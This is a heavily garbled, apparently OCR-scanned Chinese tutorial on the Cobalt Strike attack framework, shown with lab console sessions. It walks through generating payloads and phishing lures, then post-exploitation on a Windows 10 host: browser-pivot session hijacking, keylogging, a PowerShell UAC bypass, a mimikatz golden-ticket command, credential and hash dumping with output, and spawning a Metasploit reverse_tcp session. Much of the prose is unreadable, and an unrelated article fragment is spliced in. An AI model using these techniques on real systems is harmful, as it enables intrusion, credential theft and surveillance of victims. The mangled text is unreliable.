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Cobalt Strike —FXLA metasploit AEAAY GUI BUIEZESET R, S VinOiEk. RSHAM, Baitial, 2EximOE
fr, win exe RZ4ERL, win dll KSR, java RDARL, office mastk, ANDEES; VAKHEIE: hamkiE, BiirMsE
SREY, java HU1T, NISESEmEEZEZ. M Cobalt Strike 3.0 BRAREBHER Metasploit {EZEMIEA—MEZHFEEFER, SR
JLAESE Armitage TR, XBEE—MRER:

TEgibil: B3 (BITRIEEZ2Y)

Cobalt Strike 3.0 FER 7 HiEAHIBIAIRS 23088, BElL 2N ITGEE RMNEZREIAMRSEE L, HEERRSBMEEM
sessions, %A, 1EfEF Cobalt Strike ZBI, TELE java &, BNEARE, BHF java INEEE .
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SZHI#RAH Cobalt Strike fE, Cobalt Strike3.0 FEEFF RIS S PTLMHERER, L%, X MRSEATLULEIARER
BT, SENEE ORI RS,
TEYF Cobalt Strike LAEEELATILANE:
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readme.txt
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B teamserver

» third-party
M update

= undate.iar

Hep RS 4E teamserver LA cobaltstrike jar, XN EREIIRS SR LEE—MBER, AEIEY

=17

& cobaltstrike sudo ./teamserver 192.168.74.1 mst3

. ® cobaltstrike — sudo ./teamserver 192.168.74.1 msf3 — _/teamserver...
sudo . /teomserver 192.168.74.1 ms
Generating X569 certificate and keystore (for
] Added EICAR string to Malleable C2 profile. [Thi
Team server is up on 58050
SHA1l hash of 55L cert is: oaZbaf3oaf7b275f3ddaf75a51fccle

XEBATHESR, SIFEREEL ip ik, AR 0.0.0.0 & 127.0.0.1, iIRES/MNF, (ERFRERIER ip ith
HERDR],  msf3 ZEWAIRSSSRROERERD.

RSiETR, EEFmHTIER:

@ cobaltstrike java -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar $*

Connect

This is the connect dialog. You should use it to
connect to a Cobalt Strike (Aggressor) team server.
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Host: 1192.168.74.1
Port: 150050 '
User: 'i'n5f3 '

Password: |**** '

| Connect || Help |

XE ip (FHRSSEsY ip, iwOEKIA 50050, FBFRAMBE, BEAZENREANERS, ARG connect, MHIIFEN, AERE, #
H N Cobalt Strike 7,

Cobalt Strike (Trial)
Cobalt Strike View Attacks Reporting Help
O8O H=Z¢ BELPL SwBEREH o B

external internal = user computer note pid last

Event Log X
11/06 13:40:14 msf3

[11/06 13:40] msf3 [lag: @0]

I

0x02 Listeners

(&M Cobalt Strike BS54 EEQIFE— Listener, (XS5 Cobalt Strike->Listeners , SAFSaTE Add [EaTLIg)EESEERY
Listeners 7, Cobalt Strike3.0 &%
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e windows/beacon dns/reverse dns_txt

e windows/beacon _dns/reverse_http

e windows/beacon_http/reverse_http
e windows/beacon_https/reverse https
e windows/beacon smb/bind pipe

e windows/foreign/reverse dns_txt

e windows/foreign/reverse http

e windows/foreign/reverse_https

e windows/foreign/reverse tcp

Hrb windows/beaconZ Cobalt Strike HFFHMER, E7F dns,http, https,smb P E T HIE DS, windows/foreign J35M5B
mfras, BY msf 8i&E Armitage HIEEITER.
EEERITEELAS, host SEMIESIEAIABIRSEW ip, BERMRC, AEHERT, BITEEHMeIEEF 7.

0x03 Attacks

BIEMFIEITES, THREEEER in s, Cobalt Strike B3EZMIEST, H Packages BFINTILH:

 Attacks Reporting Help

Packages & HTML Application
Web Drive-by * | MS Office Macro
USB/CD AutoPlay
Windows Dropper
Windows Executable
Windows Executable (S)

HTML Application 4EffEAHY HTA K534,

Ms office Macro 4EFk office Z=fRE NS,

Payload Generator ERXEHMIEZhRAHTI payload;
use/cp Autorlay “ERFIFEBIHERUEITHIARSSUY;

r/z4nnn LSy Lt AN SN2 NLL /— A A
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Windows Dropper JHZPEE, BEWSZXY XATISRIHATHREN,
Windows Executable EEEJZE_I-#L’?U_' exe 7'(2_'],
Windows Executable(S) Eﬁi%#ﬁ?f}ﬁ’\]ﬂ?ﬂﬁ exe 7'(5_‘]0

Web Drive-by ($98Id) SN T MMER:

Attacks | Reporting Help
Packages 'PE'@&EE a
VWIEAVOT R Manage
Spear Phish Clone Site
Host File
PowerShell Web Delivery

Signed Applet Attack
Smart Applet Attack
System Profiler

Manage XJFFEHY web RSESHITEIR;

Clone site SufEMuh, AILACRZEEIERHIEE;

Host File TRH—NIUETE, BILUEX Mime (B,

Powershell Web Delivery Z{LIF msf By web delivery ;

signed Applet Attack fHFH java BERBIVERHITHAIGE;

smart Applet Attack EZDIRIN java MRAFHHITINGS, $1%d Java 1.6.0 45 LATREAK Java 1.7.0 21 LURhRAS;
system Profiler FIRIREN—ERFER, LLIIRESRIRA, Flash A, NSEERASE,

Spear Phish ZRRERMFTIERAIIEIR,

0x04 View

2 View Aftacks Reporting
; Applications

Credentials
Downloads
Event Log
Keystrokes
Proxy Pivots
Screenshots
Script Console
Targets

Web Log
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View EERAILIGEUHEEES MER, BRAHNRETLISERNEZIZREET SIS MER.

Applications BRse = eSHINAEE;

credentials B EANNNEINER, 88EHENRAITREGESE;

Downloads A4 TEK;

event Log BJLABEISEHAZE, BENEIRZFNSEM, HEEAMTUEXERIX;
Keystrokes EXZaHERBIODS;

proxy Pivots BEVERER;

Screenshots B rmtkE];

script Console FEIXERBJLANNEERFHIARLAEEINGE, MIAHIE BEL ;

Targets B& BR;

web Log B web HE.

&8 Reporting BITIBERANA Y, FEFMELIREHEY.

0x05 Beacon

Beacon RILAEREIT DNS X2 HTTP MY HOMZE, {REZERJLATEER Beacon iEiFidFEstJ#e HTTP #0 DNS, Ex2#FE+
NIERE, ZBEYF Beacon BIRER—1EERMIEZEFNAIFIZFR, Beacon Ei@idiXLeEH401H, BIrMEBHIBIFERAARI=E;
FrEa9%Z= AN A o] hRFFIE M ZZATET .

B TURE shell LU (ELANEREITEMRY exe) , FURJLAERS beacon 7, AKX, Interact, MBAIF]JF Beacon

Console;

GBI Explore »

DESKTOP-FNS@ Pivoting + &
Spawn
Session *
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£ beacon &g help, METLABEZRIFEMHGRA:

beacon> help

Beacon Commands

Command Description

browserpivot Setup a browser pivot session

bypassuac Spawn a session in a high integrity process
cancel Cancel a download that's in-progress

cd Change directory

checkin Call home and post data

clear Clear beacon queue

covertvpn Deploy Covert VPN client

desktop View and interact with target's desktop
dllinject Inject a Reflective DLL into a process
download Download a file

downloads Lists file downloads in progress

drives List drives on target

elevate Try to elevate privileges

execute Execute a program on target

exit Terminate the beacon session

getsystem Attempt to get SYSTEM

getuid Get User ID

hashdump Dump password hashes

help Help menu

inject Spawn a session in a specific process
jobkill Kill a long-running post-exploitation task
jobs List long-running post-exploitation tasks

kerberos_ccache_use
kerberos_ticket_purge

kerberos_ticket_use

Apply kerberos ticket from cache to this session

Purge kerberos tickets from this session

Apply kerberos ticket to this session

keylogger Inject a keystroke logger into a process
kill Kill a process

link Connect to a Beacon peer over SMB
logonpasswords Dump credentials and hashes with mimikatz
1s List files

make_token

Create a token to pass credentials

mimikatz Runs a mimikatz command
mkdir Make a directory
mode dns Use DNS A as data channel (DNS beacon only)

mode dns-txt

Use DNS TXT as data channel (DNS beacon only)

mode http Use HTTP as data channel

mode smb Use SMB peer-to-peer communication
net Network and host enumeration tool
note Assign a note to this Beacon
portscan Scan a network for open services

powershell

Execute a command via powershell
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powershell-import Import a powershell script

ps Show process list

psexec Use a service to spawn a session on a host
psexec_psh Use PowerShell to spawn a session on a host
pth Pass-the-hash using Mimikatz

pwd Print current directory

rev2self Revert to original token

rm Remove a file or folder

rportfwd Setup a reverse port forward

runas Execute a program as another user
screenshot Take a screenshot

shell Execute a command via cmd.exe

sleep Set beacon sleep time

socks Start SOCKS4a server to relay traffic
socks stop Stop SOCKS4a server

spawn Spawn a session

spawnas Spawn a session as another user

spawnto Set executable to spawn processes into
steal_token Steal access token from a process
timestomp Apply timestamps from one file to another
unlink Disconnect from parent Beacon

upload Upload a file

wdigest Dump plaintext credentials with mimikatz
winrm Use WinRM to spawn a session on a host
wmi Use WMI to spawn a session on a host

MTFEMERIVERL NI LIEZER help EF, :

beacon> help browserpivot
Use: browserpivot [pid] [x86|x64]
browserpivot [stop]

Setup a Browser Pivot into the specified process. To hijack authenticated
web sessions, make sure the process is an Internet Explorer tab. These

processes have iexplore.exe as their parent process.

Use "browserpivot stop" to tear down the browser pivoting sessions

associated with this Beacon.
TEHEBNEB/LMF)LAIIIEE. XBEATERRERTRER, FJLIRE
0x051 Browserpivot
FFEANZSEENGEEHE, ASHE HTTP K18, ZEMalIERIEEZERIIMNILT .,

{ER7E0, ps BEINIEERHRE:
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msdtc.exe
iexnlore. axe
iexplore.exe

Sdl CIIANdeseEl . eAg
sihost.exe
taskhostw.exe
ChsIME.exe
explorer.exe
OneDrive.exe
RuntimeBroker.exe
TPAutoConnect.exe
conhost.exe
ShellExperienceHost.exe
Microsoft.Photos.exe
powershell.exe
conhost.exe
PGPcht64.exe
audiodg.exe

"RCCEFTANMN CRHCADMAT aue 1 ax /A T40

H_l

[ ) = =y Sy Sy

ENHE:

beacon>browserpivot 3452 x64

beacon> browserpivot 3452 x86
[#] Injecting browser pivot DLL into 3452

DESKTOP-FNS@BMD\evilcg
DESKTOP-FNS@BMD\evilcg

DESKTOP-FNS@BMD\evilcg
DESKTOP-FNS@BMD\evilcg
DESKTOP-FNS@BMD\evilcg
DESKTOP-FNS@BMD\evilcg
DESKTOP-FNS@BMD\evilcg
DESKTOP-FNS@BMD\evilcg
DESKTOP-FNS@BMD\evilcg
DESKTOP-FNS@BMD\evilcg
DESKTOP-FNS@BMD\evilcg
DESKTOP-FNS@BMD\evilcg
DESKTOP-FNS@BMD\evilcg
DESKTOP-FNS@BMD\evilcg
DESKTOP-FNS@BMD\evilcg

[+] Browser Pivot HTTP proxy is at: 192.168.1.183:37929
[+] started port forward on 18173 to 127.8.8.1:18173

[+] host called home, sent: 73760 bytes

[DESKTOP-FNS@BMD] evilcg/748

peacon=

IRE AN SR U

B E2EX: beacon OnuPAC | G mxEH

KBRS #

FEER R RERSH

REHO
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FHTTPHRIHTIEE, EHARC4AHS
SDAZWFRIR. BRP. BotKille)
DDoS. M&k#/fH¥. USBZ&EH

@ http://drops wooyun.org/ D~ C @ WooYuniling | @F@t).. x
WooYunililE = - ) Evileg , BSEls, @H (9]
BEREEE NN T

F b R e =

BetaBot A Ea#h nE
2015011/06 Va3 | MEEEE | WRDN | 2 S0 T 6 | ME: 1,122

e [ B IR ) ey
w00 g&ﬁ'?ﬂ LEESFErAE

AT ERREakEen | B s BeERTeus, CrpoWall, Bedep, HS8RERAATT My L EFEeSn NS B
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0x01 IORELB R R

BetaBot, SUEERSNeurevt , CEEM01 16630 HINAET FAEMEN | METEEIESI20ME500, TR BE RFRERn
HTTPMYEEFAN . ARCARARTIOS | (TG + NS , DA, iEam , goksn O ps@wesmnog
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0x052 Socks

AJLAE#EFFE socksda UIE, AJLABERIEBHITRMEZEL.
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= socks
XEALUEEEH—E, G Pivoting->SOCKS Server, NIERALLEITTENFFE socks f{IE.

Eg& proxychains.conf, 70
SAIEFET L@ proxychains RS T EMARSIET .

BE BRI EEER msf, KX View->Proxy Pivots, 15%E#E Socks4a Proxy, =i Tunnel:

acon 192.168.74.138@2932 X Sites X
3 X Sites X Beacon 192.168.74.138@5332 X Files 192.1
type port fhost
port forward 3596 127.0.0.1
port forward 30944 127.0.0.1
e Tunnel via SOCKS 127.0.0.1

Use this command in the Metasploit Framework to tunnel
exploits and auxiliary modules through this Beacon.
Use unsetg Proxies to stop tunneling through Beacon.

setg Proxies socks4:192.168.1.103:53790| |

o

SHILE, & msf spitT, WEJLAFFERIE:

ve shells --egypt

=|: metasploit wd.11.4-dev-609dedb0
--=] 1498 exploits - 895 auxiliary - 252 post

- =-=[ 432 payloods - 37 encoders - 8

nops
P ] 5 £
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X4 socks
0x053 Screenshot&Keylogger
XEERY screenshot AILABENZ EE —EENFEEE, BEHmSH:
beacon>screenshot [pid] <x86|x64> [run time in seconds]
BE

RIE¥TFF View->Screenshots, NATLAEEIFREE:

Sites X | Weblog X | Sites X | Beacon 192.168.74.138@5896 X | Screenshots X

user | computer pid when
evilcg DESKTOP-FNSOBMD 2252 11/06 21:20:23
DESKTOP-FNSOBMD 5896 11/06 22:40:46
DESKTOP-FNSOBMD 11/06 22:43:52
evileg * DESKTOP-FNSOBMD 5896 11/06 22:45:35
evileg * DESKTOP-FNSOBMD 5896 11/06 22:47:59 i .
evileg * DESKTOP-FNSOBMD 5896 11/06 22:48:21 _ https://www.baidu.com/
evileg * DESKTOP-FNSOBMD 5896 11/06 22:57:24 —
evileg * DESKTOP-FNSOBMD 5896 11/06 22:57:30 ks e 2 40 | EE @k ED
evileg * DESKTOP-FNSOBMD 5896 11/06 22:57:35
evileg * DESKTOP-FNSOBMD 5896 11/06 22:57:40
evileg * DESKTOP-FNSOBMD 5896 11/06 22:57:45
evileg * DESKTOP-FNSOBMD 5896 11/06 22:57:51
evileg * DESKTOP-FNSOBMD 5896 11/06 22:57:56
evileg * DESKTOP-FNSOBMD 5896 11/06 22:58:01
evileg * DESKTOP-FNSOBMD 5896 11/06 22:58:06
evileg * DESKTOP-FNSOBMD 5896 11/06 22:58:12 deskto
evileg * DESKTOP-FNSOBMD 5896 11/06 22:58:17
evileg * DESKTOP-FNSOBMD 5896 11/06 22:58:22
evileg * DESKTOP-FNSOBMD 5896 11/06 22:58:27
evileg * DESKTOP-FNSOBMD 5896 11/06 22:58:33
evileg * DESKTOP-FNSOBMD 5896 11/06 22:58:38

BEICHRAIERLIUN:

Use: keylogger [pid] <x86]|x64>

RIEFIFF View->Keystrokes, MBILABZEERICRER:
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Sites X | Web Log X| Sites }<| Beacon 192.168.74.138@5896 X | Screenshots X | Credentials X | Processes 192.168.74.138@5896 X | Processes 192.16!

user computer pid when
ilcg * DESKTOP-FNSD0... 5896 11/06 23:0

www . baidu

www . baidu. com °UfEENE+ Internet Explorer

,CO

MEREERGST, TUESARTEEITEN (T58k) , 5% ->Explore->Process List:

Sites X | Weblog X | Sites X | Beacon 192.168.74.138@5896 X | Screenshots X | Credentials X | Processes 192.168.74.138@5896 X | Keystrokes X
il LEID Hamcamemm" Arch Session T
2584 828 ApplicationFrameHost.exe x64 1 DESKTOP-FNSOBMD\evilcg =
4428 828 Microsoft.Photos.exe x64 1 DESKTOP-FNSOBMD\evilcg
1636 828 WinStore.Mobile.exe x64 1 DESKTOP-FNSOBMD\evilcg
1864 3908 cmd.exe x64 1 DESKTOP-FNSOBMD\evilcg
5692 1864 conhost.exe x64 1 DESKTOP-FNSOBMD\evilcg
4956 600 WUDFHost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
64 3908 cmd.exe x64 1 DESKTOP-FNSOBMD\evilcg
2868 64 conhost.exe x64 1 DESKTOP-FNSOBMD\evilcg
4744 64 powershell.exe x64 1 DESKTOP-FNSOBMD\evilcg
2252 4744 powershell.exe %86 1 DESKTOP-FNSOBMD\evilcg
2860 2252 conhost.exe x64 1 DESKTOP-FNSOBMD\evilcg
5896 1144 test.exe x86 1 DESKTOP-FNSOBMD\evilcg
3624 828 SearchULexe x64 1 DESKTOP-FNSOBMD\evilcg
4040 3908 iexplore.exe x64 1 DESKTOP-FNSOBMD\evilcg
5520 4040 iexplore.exe %86 1 DESKTOP-FNSOBMD\evilcg
660 828 FlashUtil_ActiveX.exe x64 1 DESKTOP-FNSOBMD\evilcg
6048 4040 iexplore.exe x86 1 DESKTOP-FNSOBMD\evilcg
5416 4040 iexplore.exe x86 1 DESKTOP-FNSOBMD\evilcg
5540 4040 iexplore.exe xB6 1 DESKTOP-FNSOBMD\evilcg
3948 636 audiodg.exe ¢
2628 992 LiveUpdate.exe x86 1 DESKTOP-FNSOBMD\evilcg -
[ kin || Refresh | [ 1Inject || Log Keystrokes || screenshot || steal Token | | Help |

0x054 powershell-import

XNheeERsEUHPREER, LIS AEM powershell i2&1E2E, LUl nishang AY powerpreter, B#EHT:

beacon> powershell-import
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ARSI NI SR 2 R EIERE Powerpreter.psm1:

il o

Select script to import

#&4(1): | powerpreter - 3 & O |@ E

(= Powerpreter.psm1
[ README.md

-¢.=-1() Bl Powerpreter.psm 1
TEEEET): |BRE St g

A BT
powershell-import [/path/to/local/script.psi]
TN, ZEHALUER powerpreter RIRFMEER T,

BTREREZFERIN <, ean:

beacon>powershell Check-VM

beacon> powershell Check-\UM

[#] Tasked beacon to rum: Check-\M
[+] host called home, sent: 16 bytes
[+] received output:

#< CLIXML

This is a Hyper-V machine.

This is a UMWare machine.

<0Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com
Refld="0"><T=5ystem.Management.Automation.P5CustomObject</T=
N="Record"><AV>0y0Ux4+ Ex IE'0AA£iéif</AV><AI>0</AI><Nil />4
Refld="1"><TNRef RefId="0" /><MS><I64 N="Sourceld">2</I64><H
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KT powerpreter ZHiI{t zone BEEINNE, powershell [FEEESR powerpreter ,

0x055 kerberos tH%
XE—HE=MER, HFIR
e kerberos ccache use : M ccache X{FFHSNESE
e kerberos_ticket purge : iBRHRISTENENRE
 kerberos_ticket use: M ticket S SNEE
SREE S =HEAYSTULLUNGEER mimikatz:

kerberos::golden /admin:USER /domain:DOMAIN /sid:SID /krbtgt:HASH /ticket:FILE

S5 Z=XTF kerberos tBERXXE, BXEBNALIE—T:
ARZIEFAY mimikatz
iWisENE AR

IR AME SR P ~

0x056 BypassUAC

4, 1FRARREEZRE? ik bypassuac 1B~
BT

TEFRH A LA TR E B RSN RAIRIET
X—RAENE Win10 BIBRHMEFZEMIN, XF Win10 By bypassuac BBAEBEEZEmEEHEINGA, Fi5 BT

X ERERER bypassuac B powershell BIZASIREN Win10 &SR, HF nishang BY powershell BIARIAEHASHF
Win10, FTLUXEFHERT —MERIESREY powershell BIZ invoke-BypassUAC.ps1

A pi— beacon Fi7J:
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) B

Windows Executable

This dialog generates a Windows executable. Use Cobalt =
Strike Arsenal scripts (Help -> Arsenal) to customize this

-

Listener: '?revers.e_htm 'H Add |

Output: | Windows EXE -

| Generate || Help |

HERIT:

beacon> cd E:

beacon>upload /Users/evilcg/Desktop/test.exe

n#E; powershell #117E07:

beacon>powershell-import /Users/evilcg/Pentest/Powershell/MyShell/invoke-BypassUAC.psl
beacon> powershell Invoke-BypassUAC -Command 'E:\test.exe'
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beacon> powershell Invoke-BypassUAC -Command ‘E:\test.exe'
[#] Tasked beacon to run: Invoke-BypassUAC -Command 'E:\test.exe'
[+] host called home, sent: 47 bytes

[+] received output:

#< CLIXML

[+] received output:
<0bjs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><0bj S="prog

RefIld="0"><T>System.Management.Automation.PSCustomObject</T><T>System.0bject</T></TN><MS><I6
N="Record"><AV>0y0Ux%+ Ex IE'OAA£Léi£</AV><AI>0</AI><Nil /><PI>-1</PI><P(>-1</PC><T>Completed
RefId="1"><TNRef Refld="0" /><MS><I64 N="Sourceld">2</I64><PR N="Record"=<AV=0y0Ux%+ Ex IE'0A

[DESKTOP-FNS@BMD] evilcg,/2252
e-—— |

SEFRAR M 7 AYEBAXAY beacon SEENEERD

beacon>sleep 0

beacon>wdigest

[+] host called home, sent: 297547 bytes
[+] received output:

Authentication Id : © ; 208050 (PPO0OAO0L:00032ch2)
Session : Interactive from 1

User Name : evilcg
Domain : DESKTOP-FNSBBMD
5ID ! 5=1-5-21-792390344-1904367444-1519734

wdigest :
#* Username : evilcg
% Domain : DESKTOP-FNSBBMD

% Password : (null)

Authentication Id : © ; 207991 (90000000 :00032c77)
Session : Interactive from 1

User Name

[DESKTOP-FNSOBMD] e ilcé */5896

beacon> hashdump

[#] Tasked beacon to dump hashes
[+] host called home, sent: 82501 bytes
[+] received password hashes:

Administrator:500:aad3b435b51404eeaad3b435b514084ee:31d6cfefdl6aed31b73c59d7eBcB89ch: ; ;
DefaultAccount:583:aad3b435b51404eeaad3b435b51404ee:31d6cfeddlbaed31b73c59d7eBcB89cO: : ;
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Guest: 5@1 aad3b435b51404eeaad3b435b51404ee:31d6cfeddl6ae931b73c59d7eBcBB89cO:

0x06 5 msf BXE]]

A

AELIBIT cobalt strike $KEXZ! meterpreter Ig,

L3~z

cobalt strike3.0 <R Metasploit {EZEM{EN
BBy, BTLMMEIAY.
B7cEAER msf B9 reverse_tcp FRIEITER :

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.74.1

lhost => 192.168.74.1

msf exploit(handler) > set lport 5555

lport => 5555

msf exploit(handler) > exploit -j

Zfaf#H Cobalt Strike €lE#—1 windows/foreign/reverse tcp Listener:

i & = Mew Listener

Create a listener.

[

Name: meter ]

Payload: [winduwsffureignf reverse_tcp = l

Host:  |192.168.74.1 l
Port:  |5555] 1

| save_|

Hrhip /9 msf B9 ip #bk, w04 msf FriatraimO.,
AiEEPITEN, &% ->Spawn:

_
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Session
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name payload host port
reverse_http windows/beacon_http/reverse_http 192.168.74.1 5888

windows/foreign/reverse_tcp 192.168.74.1

Choose .|| Add. || Help. |

BILABZEIRINIREN 7 meterpreter [AliF:

3

Started reverse handler on 192,168 74.1:5555
exploit( 3= Starting the paylood handler. ..

exploit( 3=

exploit( 3>

Sending stoge (285806 b Y to 197.168.74.138 5

Meterpreter session 1 ened (192.168.74.1:5555 -> 192.168. 74_138:57999) ot 2015- f
[11-96 23:18:24 +2300
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